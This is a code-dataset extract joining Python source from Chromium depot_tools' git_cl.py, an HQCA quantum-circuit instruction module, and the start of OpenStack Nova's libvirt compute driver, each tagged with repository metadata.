if options.clear:
state = _CQState.CLEAR
elif options.dry_run:
state = _CQState.DRY_RUN
else:
state = _CQState.COMMIT
if not cl.GetIssue():
parser.error('Must upload the issue first')
cl.SetCQState(state)
return 0
def CMDset_close(parser, args):
"""Closes the issue."""
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
cl = Changelist(auth_config=auth_config)
# Ensure there actually is an issue to close.
cl.GetDescription()
cl.CloseIssue()
return 0
def CMDdiff(parser, args):
"""Shows differences between local tree and last upload."""
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
# Uncommitted (staged and unstaged) changes will be destroyed by
# "git reset --hard" if there are merging conflicts in CMDPatchIssue().
# Staged changes would be committed along with the patch from last
# upload, hence counted toward the "last upload" side in the final
# diff output, and this is not what we want.
if git_common.is_dirty_git_tree('diff'):
return 1
cl = Changelist(auth_config=auth_config)
issue = cl.GetIssue()
branch = cl.GetBranch()
if not issue:
DieWithError('No issue found for current branch (%s)' % branch)
TMP_BRANCH = 'git-cl-diff'
base_branch = cl.GetCommonAncestorWithUpstream()
# Create a new branch based on the merge-base
RunGit(['checkout', '-q', '-b', TMP_BRANCH, base_branch])
# Clear cached branch in cl object, to avoid overwriting original CL branch
# properties.
cl.ClearBranch()
try:
rtn = cl.CMDPatchIssue(issue, reject=False, nocommit=False, directory=None)
if rtn != 0:
RunGit(['reset', '--hard'])
return rtn
# Switch back to starting branch and diff against the temporary
# branch containing the latest rietveld patch.
subprocess2.check_call(['git', 'diff', TMP_BRANCH, branch, '--'])
finally:
RunGit(['checkout', '-q', branch])
RunGit(['branch', '-D', TMP_BRANCH])
return 0
def CMDowners(parser, args):
"""Interactively find the owners for reviewing."""
parser.add_option(
'--no-color',
action='store_true',
help='Use this option to disable color output')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
author = RunGit(['config', 'user.email']).strip() or None
cl = Changelist(auth_config=auth_config)
if args:
if len(args) > 1:
parser.error('Unknown args')
base_branch = args[0]
else:
# Default to diffing against the common ancestor of the upstream branch.
base_branch = cl.GetCommonAncestorWithUpstream()
change = cl.GetChange(base_branch, None)
return owners_finder.OwnersFinder(
[f.LocalPath() for f in
cl.GetChange(base_branch, None).AffectedFiles()],
change.RepositoryRoot(), author,
fopen=file, os_path=os.path, glob=glob.glob,
disable_color=options.no_color).run()
def BuildGitDiffCmd(diff_type, upstream_commit, args):
"""Generates a diff command."""
# Generate diff for the current branch's changes.
diff_cmd = ['diff', '--no-ext-diff', '--no-prefix', diff_type,
upstream_commit, '--' ]
if args:
for arg in args:
if os.path.isdir(arg) or os.path.isfile(arg):
diff_cmd.append(arg)
else:
DieWithError('Argument "%s" is not a file or a directory' % arg)
return diff_cmd
def MatchingFileType(file_name, extensions):
"""Returns true if the file name ends with one of the given extensions."""
return bool([ext for ext in extensions if file_name.lower().endswith(ext)])
@subcommand.usage('[files or directories to diff]')
def CMDformat(parser, args):
"""Runs auto-formatting tools (clang-format etc.) on the diff."""
CLANG_EXTS = ['.cc', '.cpp', '.h', '.mm', '.proto', '.java']
GN_EXTS = ['.gn', '.gni', '.typemap']
parser.add_option('--full', action='store_true',
help='Reformat the full content of all touched files')
parser.add_option('--dry-run', action='store_true',
help='Don\'t modify any file on disk.')
parser.add_option('--python', action='store_true',
help='Format python code with yapf (experimental).')
parser.add_option('--diff', action='store_true',
help='Print diff to stdout rather than modifying files.')
opts, args = parser.parse_args(args)
# git diff generates paths against the root of the repository. Change
# to that directory so clang-format can find files even within subdirs.
rel_base_path = settings.GetRelativeRoot()
if rel_base_path:
os.chdir(rel_base_path)
# Grab the merge-base commit, i.e. the upstream commit of the current
# branch when it was created or the last time it was rebased. This is
# to cover the case where the user may have called "git fetch origin",
# moving the origin branch to a newer commit, but hasn't rebased yet.
upstream_commit = None
cl = Changelist()
upstream_branch = cl.GetUpstreamBranch()
if upstream_branch:
upstream_commit = RunGit(['merge-base', 'HEAD', upstream_branch])
upstream_commit = upstream_commit.strip()
if not upstream_commit:
DieWithError('Could not find base commit for this branch. '
'Are you in detached state?')
changed_files_cmd = BuildGitDiffCmd('--name-only', upstream_commit, args)
diff_output = RunGit(changed_files_cmd)
diff_files = diff_output.splitlines()
# Filter out files deleted by this CL
diff_files = [x for x in diff_files if os.path.isfile(x)]
clang_diff_files = [x for x in diff_files if MatchingFileType(x, CLANG_EXTS)]
python_diff_files = [x for x in diff_files if MatchingFileType(x, ['.py'])]
dart_diff_files = [x for x in diff_files if MatchingFileType(x, ['.dart'])]
gn_diff_files = [x for x in diff_files if MatchingFileType(x, GN_EXTS)]
top_dir = os.path.normpath(
RunGit(["rev-parse", "--show-toplevel"]).rstrip('\n'))
# Set to 2 to signal to CheckPatchFormatted() that this patch isn't
# formatted. This is used to block during the presubmit.
return_value = 0
if clang_diff_files:
# Locate the clang-format binary in the checkout
try:
clang_format_tool = clang_format.FindClangFormatToolInChromiumTree()
except clang_format.NotFoundError as e:
DieWithError(e)
if opts.full:
cmd = [clang_format_tool]
if not opts.dry_run and not opts.diff:
cmd.append('-i')
stdout = RunCommand(cmd + clang_diff_files, cwd=top_dir)
if opts.diff:
sys.stdout.write(stdout)
else:
env = os.environ.copy()
env['PATH'] = str(os.path.dirname(clang_format_tool))
try:
script = clang_format.FindClangFormatScriptInChromiumTree(
'clang-format-diff.py')
except clang_format.NotFoundError as e:
DieWithError(e)
cmd = [sys.executable, script, '-p0']
if not opts.dry_run and not opts.diff:
cmd.append('-i')
diff_cmd = BuildGitDiffCmd('-U0', upstream_commit, clang_diff_files)
diff_output = RunGit(diff_cmd)
stdout = RunCommand(cmd, stdin=diff_output, cwd=top_dir, env=env)
if opts.diff:
sys.stdout.write(stdout)
if opts.dry_run and len(stdout) > 0:
return_value = 2
# Similar code to above, but using yapf on .py files rather than clang-format
# on C/C++ files
if opts.python:
yapf_tool = gclient_utils.FindExecutable('yapf')
if yapf_tool is None:
DieWithError('yapf not found in PATH')
if opts.full:
if python_diff_files:
cmd = [yapf_tool]
if not opts.dry_run and not opts.diff:
cmd.append('-i')
stdout = RunCommand(cmd + python_diff_files, cwd=top_dir)
if opts.diff:
sys.stdout.write(stdout)
else:
# TODO(sbc): yapf --lines mode still has some issues.
# https://github.com/google/yapf/issues/154
DieWithError('--python currently only works with --full')
# Dart's formatter does not have the nice property of only operating on
# modified chunks, so hard code full.
if dart_diff_files:
try:
command = [dart_format.FindDartFmtToolInChromiumTree()]
if not opts.dry_run and not opts.diff:
command.append('-w')
command.extend(dart_diff_files)
stdout = RunCommand(command, cwd=top_dir)
if opts.dry_run and stdout:
return_value = 2
except dart_format.NotFoundError as e:
print('Warning: Unable to check Dart code formatting. Dart SDK not '
'found in this checkout. Files in other languages are still '
'formatted.')
# Format GN build files. Always run on full build files for canonical form.
if gn_diff_files:
cmd = ['gn', 'format']
if not opts.dry_run and not opts.diff:
cmd.append('--in-place')
for gn_diff_file in gn_diff_files:
stdout = RunCommand(cmd + [gn_diff_file],
shell=sys.platform == 'win32',
cwd=top_dir)
if opts.diff:
sys.stdout.write(stdout)
return return_value
@subcommand.usage('<codereview url or issue id>')
def CMDcheckout(parser, args):
"""Checks out a branch associated with a given Rietveld or Gerrit issue."""
_, args = parser.parse_args(args)
if len(args) != 1:
parser.print_help()
return 1
issue_arg = ParseIssueNumberArgument(args[0])
if not issue_arg.valid:
parser.print_help()
return 1
target_issue = str(issue_arg.issue)
def find_issues(issueprefix):
output = RunGit(['config', '--local', '--get-regexp',
r'branch\..*\.%s' % issueprefix],
error_ok=True)
for key, issue in [x.split() for x in output.splitlines()]:
if issue == target_issue:
yield re.sub(r'branch\.(.*)\.%s' % issueprefix, r'\1', key)
branches = []
for cls in _CODEREVIEW_IMPLEMENTATIONS.values():
branches.extend(find_issues(cls.IssueSettingSuffix()))
if len(branches) == 0:
print('No branch found for issue %s.' % target_issue)
return 1
if len(branches) == 1:
RunGit(['checkout', branches[0]])
else:
print('Multiple branches match issue %s:' % target_issue)
for i in range(len(branches)):
print('%d: %s' % (i, branches[i]))
which = raw_input('Choose by index: ')
try:
RunGit(['checkout', branches[int(which)]])
except (IndexError, ValueError):
print('Invalid selection, not checking out any branch.')
return 1
return 0
def CMDlol(parser, args):
# This command is intentionally undocumented.
print(zlib.decompress(base64.b64decode(
'eNptkLEOwyAMRHe+wupCIqW57v0Vq84WqWtXyrcXnCBsmgMJ+/SSAxMZgRB6NzE'
'E2ObgCKJooYdu4uAQVffUEoE1sRQLxAcqzd7uK2gmStrll1ucV3uZyaY5sXyDd9'
'JAnN+lAXsOMJ90GANAi43mq5/VeeacylKVgi8o6F1SC63FxnagHfJUTfUYdCR/W'
'Ofe+0dHL7PicpytKP750Fh1q2qnLVof4w8OZWNY')))
return 0
class OptionParser(optparse.OptionParser):
"""Creates the option parse and add --verbose support."""
def __init__(self, *args, **kwargs):
optparse.OptionParser.__init__(
self, *args, prog='git cl', version=__version__, **kwargs)
self.add_option(
'-v', '--verbose', action='count', default=0,
help='Use 2 times for more debugging info')
def parse_args(self, args=None, values=None):
options, args = optparse.OptionParser.parse_args(self, args, values)
levels = [logging.WARNING, logging.INFO, logging.DEBUG]
logging.basicConfig(level=levels[min(options.verbose, len(levels) - 1)])
return options, args
def main(argv):
if sys.hexversion < 0x02060000:
print('\nYour python version %s is unsupported, please upgrade.\n' %
(sys.version.split(' ', 1)[0],), file=sys.stderr)
return 2
# Reload settings.
global settings
settings = Settings()
colorize_CMDstatus_doc()
dispatcher = subcommand.CommandDispatcher(__name__)
try:
return dispatcher.execute(OptionParser(), argv)
except auth.AuthenticationError as e:
DieWithError(str(e))
except urllib2.HTTPError as e:
if e.code != 500:
raise
DieWithError(
('AppEngine is misbehaving and returned HTTP %d, again. Keep faith '
'and retry or visit go/isgaeup.\n%s') % (e.code, str(e)))
return 0
if __name__ == '__main__':
# These affect sys.stdout so do it outside of main() to simplify mocks in
# unit testing.
fix_encoding.fix_encoding()
setup_color.init()
try:
sys.exit(main(sys.argv[1:]))
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
| 37.336608 | 80 | 0.654348 | [
"BSD-3-Clause"
] | wuyong2k/chromium_depot_tool | git_cl.py | 190,006 | Python |
import numpy as np
from hqca.core import *
from hqca.core.primitives import *
from hqca.tools import *
import sys
from numpy import sin as sin
from numpy import cos as cos
from copy import deepcopy as copy
class ExpPauli:
def __init__(self,vec):
v = np.asmatrix(vec)
if v.shape[0]>v.shape[1]:
v = v.T
if np.linalg.norm(v)==0:
self.iden=True
self.a = 0
self.v = v
else:
self.iden=False
self.a = np.linalg.norm(v)
self.v = v/self.a
def __mul__(self,w):
if self.iden:
return w
if w.iden:
return self
cc = np.cos(self.a)*np.cos(w.a)
cs = np.cos(self.a)*np.sin(w.a)
sc = np.sin(self.a)*np.cos(w.a)
ss = np.sin(self.a)*np.sin(w.a)
c = np.arccos(cc-np.dot(self.v,w.v.T)*ss)
k1 = self.v*sc
k2 = w.v*cs
k3 = -np.cross(self.v,w.v)*ss
k = (1/np.sin(c))*(k1+k2+k3)
return ExpPauli(c*k)
def __str__(self):
t = '||v||: {:.5f}, '.format(self.a)
t+= 'nx: {:+.5f}, '.format(self.v[0,0])
t+= 'ny: {:+.5f}, '.format(self.v[0,1])
t+= 'nz: {:+.5f}'.format(self.v[0,2])
return t
def matrix(self):
x = np.matrix([[0,1],[1,0]],dtype=np.complex_)
y = np.matrix([[0,-1j],[1j,0]],dtype=np.complex_)
z = np.matrix([[1,0],[0,-1]],dtype=np.complex_)
nx,ny,nz = self.v[0,0],self.v[0,1],self.v[0,2]
i = np.identity(2)
if self.iden:
return np.identity(2)
return np.cos(self.a)*i + (x*nx+y*ny+z*nz)*1j*np.sin(self.a)
def U3(self):
if self.iden:
return 0,0,0
A = np.sin(self.a)**2
nx,ny,nz = self.v[0,0],self.v[0,1],self.v[0,2]
part = nx**2+ny**2
vd = np.cos(self.a)+1j*nz*np.sin(self.a)
vo = (1j*nx-ny)*np.sin(self.a)
if abs(part-0)<=1e-10:
theta= 0
sigma = (1j*np.log(vd)).real
delta= 0
else:
theta = 2*np.arcsin(np.sqrt((nx**2+ny**2)*A))
aleph=-ny*np.sin(self.a)/np.sin(theta/2)
beta = nx*np.sin(self.a)/np.sin(theta/2)
delta = (-1j*np.log(vo/np.sin(theta/2))).real
sigma = (1j*np.log(vd/np.cos(theta/2))).real
return theta,sigma+delta,sigma-delta
class BenzyneInstruct(Instructions):
'''
type 1, 2 and 3
'''
def __init__(self,operator,
Nq,
propagate=False,
HamiltonianOperator=[],
scaleH=1,
**kw):
if not Nq==1:
sys.exit('Did not 1 qubit in instructions...')
para = np.array([0.0,0.0,0.0])
expS = ExpPauli(para)
for A in operator:
para = np.array([0.0,0.0,0.0])
for o in A:
if o.s=='X':
para[0]=np.imag(o.c)
elif o.s=='Y':
para[1]=np.imag(o.c)
elif o.s=='Z':
para[2]=np.imag(o.c)
expS = ExpPauli(para)*expS
#
paraH = np.array([0.0,0.0,0.0])
for o in HamiltonianOperator:
if o.s=='X':
paraH[0]= np.real(o.c)*scaleH
elif o.s=='Y':
paraH[1]=np.real(o.c)*scaleH
elif o.s=='Z':
paraH[2]=np.real(o.c)*scaleH
expiH = ExpPauli(paraH)
exp = expiH*expS
self._gates = [
[(exp,),self._U3]
]
@property
def gates(self):
return self._gates
@gates.setter
def gates(self,a):
self._gates = a
def _U3(self,Q,exp):
theta,phi,lamb = exp.U3()
Q.U3(0,theta,phi,lamb)
| 29.304688 | 68 | 0.466276 | [
"Apache-2.0"
] | damazz/HQCA | examples/r2021_arxiv_qcase_benzyne/_instruct_22.py | 3,751 | Python |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to a hypervisor through libvirt.
Supports KVM, LXC, QEMU, UML, and XEN.
"""
import errno
import functools
import glob
import mmap
import os
import shutil
import socket
import sys
import tempfile
import threading
import time
import uuid
import eventlet
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from eventlet import util as eventlet_util
from lxml import etree
from oslo.config import cfg
import six
from nova.api.metadata import base as instance_metadata
from nova import block_device
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_mode
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import image
from nova import objects
from nova.openstack.common import excutils
from nova.openstack.common import fileutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import loopingcall
from nova.openstack.common import processutils
from nova.openstack.common import units
from nova.openstack.common import xmlutils
from nova.pci import pci_manager
from nova.pci import pci_utils
from nova.pci import pci_whitelist
from nova import rpc
from nova import utils
from nova import version
from nova.virt import block_device as driver_block_device
from nova.virt import configdrive
from nova.virt.disk import api as disk
from nova.virt.disk.vfs import guestfs
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import firewall
from nova.virt import hardware
from nova.virt.libvirt import blockinfo
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import firewall as libvirt_firewall
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import lvm
from nova.virt.libvirt import rbd
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt.libvirt import vif as libvirt_vif
from nova.virt import netutils
from nova.virt import watchdog_actions
from nova import volume
from nova.volume import encryptors
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('rescue_image_id',
help='Rescue ami image. This will not be used if an image id '
'is provided by the user.'),
cfg.StrOpt('rescue_kernel_id',
help='Rescue aki image'),
cfg.StrOpt('rescue_ramdisk_id',
help='Rescue ari image'),
cfg.StrOpt('virt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('connection_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on virt_type)'),
cfg.BoolOpt('inject_password',
default=False,
help='Inject the admin password at boot time, '
'without an agent.'),
cfg.BoolOpt('inject_key',
default=False,
help='Inject the ssh public key at boot time'),
cfg.IntOpt('inject_partition',
default=-2,
help='The partition to inject to : '
'-2 => disable, -1 => inspect (libguestfs only), '
'0 => not partitioned, >0 => partition number'),
cfg.BoolOpt('use_usb_tablet',
default=True,
help='Sync virtual and real mouse cursors in Windows VMs'),
cfg.StrOpt('live_migration_uri',
default="qemu+tcp://%s/system",
help='Migration target URI '
'(any included "%s" is replaced with '
'the migration target hostname)'),
cfg.StrOpt('live_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER',
help='Migration flags to be set for live migration'),
cfg.StrOpt('block_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_NON_SHARED_INC',
help='Migration flags to be set for block migration'),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help='Maximum bandwidth to be used during migration, in Mbps'),
cfg.StrOpt('snapshot_image_format',
help='Snapshot image format (valid options are : '
'raw, qcow2, vmdk, vdi). '
'Defaults to same as source image'),
cfg.ListOpt('volume_drivers',
default=[
'iscsi=nova.virt.libvirt.volume.LibvirtISCSIVolumeDriver',
'iser=nova.virt.libvirt.volume.LibvirtISERVolumeDriver',
'local=nova.virt.libvirt.volume.LibvirtVolumeDriver',
'fake=nova.virt.libvirt.volume.LibvirtFakeVolumeDriver',
'rbd=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'sheepdog=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'nfs=nova.virt.libvirt.volume.LibvirtNFSVolumeDriver',
'aoe=nova.virt.libvirt.volume.LibvirtAOEVolumeDriver',
'glusterfs='
'nova.virt.libvirt.volume.LibvirtGlusterfsVolumeDriver',
'fibre_channel=nova.virt.libvirt.volume.'
'LibvirtFibreChannelVolumeDriver',
'scality='
'nova.virt.libvirt.volume.LibvirtScalityVolumeDriver',
],
help='Libvirt handlers for remote volumes.'),
cfg.StrOpt('disk_prefix',
help='Override the default disk prefix for the devices attached'
' to a server, which is dependent on virt_type. '
'(valid options are: sd, xvd, uvd, vd)'),
cfg.IntOpt('wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.StrOpt('cpu_mode',
help='Set to "host-model" to clone the host CPU feature flags; '
'to "host-passthrough" to use the host CPU model exactly; '
'to "custom" to use a named CPU model; '
'to "none" to not set any CPU model. '
'If virt_type="kvm|qemu", it will default to '
'"host-model", otherwise it will default to "none"'),
cfg.StrOpt('cpu_model',
help='Set to a named libvirt CPU model (see names listed '
'in /usr/share/libvirt/cpu_map.xml). Only has effect if '
'cpu_mode="custom" and virt_type="kvm|qemu"'),
cfg.StrOpt('snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: file=directsync,block=none'),
cfg.StrOpt('rng_dev_path',
help='A path to a device that will be used as source of '
'entropy on the host. Permitted options are: '
'/dev/random or /dev/hwrng'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts, 'libvirt')
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
CONF.import_opt('server_proxyclient_address', 'nova.spice', group='spice')
CONF.import_opt('vcpu_pin_set', 'nova.virt.hardware')
CONF.import_opt('vif_plugging_is_fatal', 'nova.virt.driver')
CONF.import_opt('vif_plugging_timeout', 'nova.virt.driver')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
libvirt_firewall.__name__,
libvirt_firewall.IptablesFirewallDriver.__name__)
MAX_CONSOLE_BYTES = 100 * units.Ki
# The libvirt driver will prefix any disable reason codes with this string.
DISABLE_PREFIX = 'AUTO: '
# Disable reason for the service which was enabled or disabled without reason
DISABLE_REASON_UNDEFINED = 'None'
def patch_tpool_proxy():
"""eventlet.tpool.Proxy doesn't work with old-style class in __str__()
or __repr__() calls. See bug #962840 for details.
We perform a monkey patch to replace those two instance methods.
"""
def str_method(self):
return str(self._obj)
def repr_method(self):
return repr(self._obj)
tpool.Proxy.__str__ = str_method
tpool.Proxy.__repr__ = repr_method
patch_tpool_proxy()
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
LIBVIRT_POWER_STATE = {
VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
VIR_DOMAIN_RUNNING: power_state.RUNNING,
# NOTE(maoy): The DOMAIN_BLOCKED state is only valid in Xen.
# It means that the VM is running and the vCPU is idle. So,
# we map it to RUNNING
VIR_DOMAIN_BLOCKED: power_state.RUNNING,
VIR_DOMAIN_PAUSED: power_state.PAUSED,
# NOTE(maoy): The libvirt API doc says that DOMAIN_SHUTDOWN
# means the domain is being shut down. So technically the domain
# is still running. SHUTOFF is the real powered off state.
# But we will map both to SHUTDOWN anyway.
# http://libvirt.org/html/libvirt-libvirt.html
VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
VIR_DOMAIN_CRASHED: power_state.CRASHED,
VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
MIN_LIBVIRT_VERSION = (0, 9, 11)
# When the above version matches/exceeds this version
# delete it & corresponding code using it
MIN_LIBVIRT_DEVICE_CALLBACK_VERSION = (1, 1, 1)
# Live snapshot requirements
REQ_HYPERVISOR_LIVESNAPSHOT = "QEMU"
# TODO(sdague): this should be 1.0.0, but hacked to set 1.3.0 until
# https://bugs.launchpad.net/nova/+bug/1334398
# can be diagnosed & resolved
MIN_LIBVIRT_LIVESNAPSHOT_VERSION = (1, 3, 0)
MIN_QEMU_LIVESNAPSHOT_VERSION = (1, 3, 0)
# block size tuning requirements
MIN_LIBVIRT_BLOCKIO_VERSION = (0, 10, 2)
# BlockJobInfo management requirement
MIN_LIBVIRT_BLOCKJOBINFO_VERSION = (1, 1, 1)
# Relative block commit (feature is detected,
# this version is only used for messaging)
MIN_LIBVIRT_BLOCKCOMMIT_RELATIVE_VERSION = (1, 2, 7)
def libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
class LibvirtDriver(driver.ComputeDriver):
capabilities = {
"has_imagecache": True,
"supports_recreate": True,
}
def __init__(self, virtapi, read_only=False):
super(LibvirtDriver, self).__init__(virtapi)
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._skip_list_all_domains = False
self._host_state = None
self._initiator = None
self._fc_wwnns = None
self._fc_wwpns = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._caps = None
self._vcpu_total = 0
self.read_only = read_only
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self.virtapi,
get_connection=self._get_connection)
self.vif_driver = libvirt_vif.LibvirtGenericVIFDriver(
self._get_connection)
self.volume_drivers = driver.driver_dict_from_config(
CONF.libvirt.volume_drivers, self)
self.dev_filter = pci_whitelist.get_pci_devices_filter()
self._event_queue = None
self._disk_cachemode = None
self.image_cache_manager = imagecache.ImageCacheManager()
self.image_backend = imagebackend.Backend(CONF.use_cow_images)
self.disk_cachemodes = {}
self.valid_cachemodes = ["default",
"none",
"writethrough",
"writeback",
"directsync",
"unsafe",
]
self._conn_supports_start_paused = CONF.libvirt.virt_type in ('kvm',
'qemu')
for mode_str in CONF.libvirt.disk_cachemodes:
disk_type, sep, cache_mode = mode_str.partition('=')
if cache_mode not in self.valid_cachemodes:
LOG.warn(_LW('Invalid cachemode %(cache_mode)s specified '
'for disk type %(disk_type)s.'),
{'cache_mode': cache_mode, 'disk_type': disk_type})
continue
self.disk_cachemodes[disk_type] = cache_mode
self._volume_api = volume.API()
self._image_api = image.API()
@property
def disk_cachemode(self):
if self._disk_cachemode is None:
# We prefer 'none' for consistent performance, host crash
# safety & migration correctness by avoiding host page cache.
# Some filesystems (eg GlusterFS via FUSE) don't support
# O_DIRECT though. For those we fallback to 'writethrough'
# which gives host crash safety, and is safe for migration
# provided the filesystem is cache coherent (cluster filesystems
# typically are, but things like NFS are not).
self._disk_cachemode = "none"
if not self._supports_direct_io(CONF.instances_path):
self._disk_cachemode = "writethrough"
return self._disk_cachemode
@property
def host_state(self):
if not self._host_state:
self._host_state = HostState(self)
return self._host_state
def _set_cache_mode(self, conf):
"""Set cache mode on LibvirtConfigGuestDisk object."""
try:
source_type = conf.source_type
driver_cache = conf.driver_cache
except AttributeError:
return
cache_mode = self.disk_cachemodes.get(source_type,
driver_cache)
conf.driver_cache = cache_mode
@staticmethod
def _conn_has_min_version(conn, lv_ver=None, hv_ver=None, hv_type=None):
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if libvirt_version < utils.convert_version_to_int(lv_ver):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if hypervisor_version < utils.convert_version_to_int(hv_ver):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def _has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._conn_has_min_version(self._conn, lv_ver, hv_ver, hv_type)
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self.queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
self.emit_event(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = last_close_event['reason']
_error = _("Connection to libvirt lost: %s") % reason
LOG.warn(_error)
self._wrapped_conn = None
# Disable compute service to avoid
# new instances of being scheduled on this host.
self._set_host_enabled(False, disable_reason=_error)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
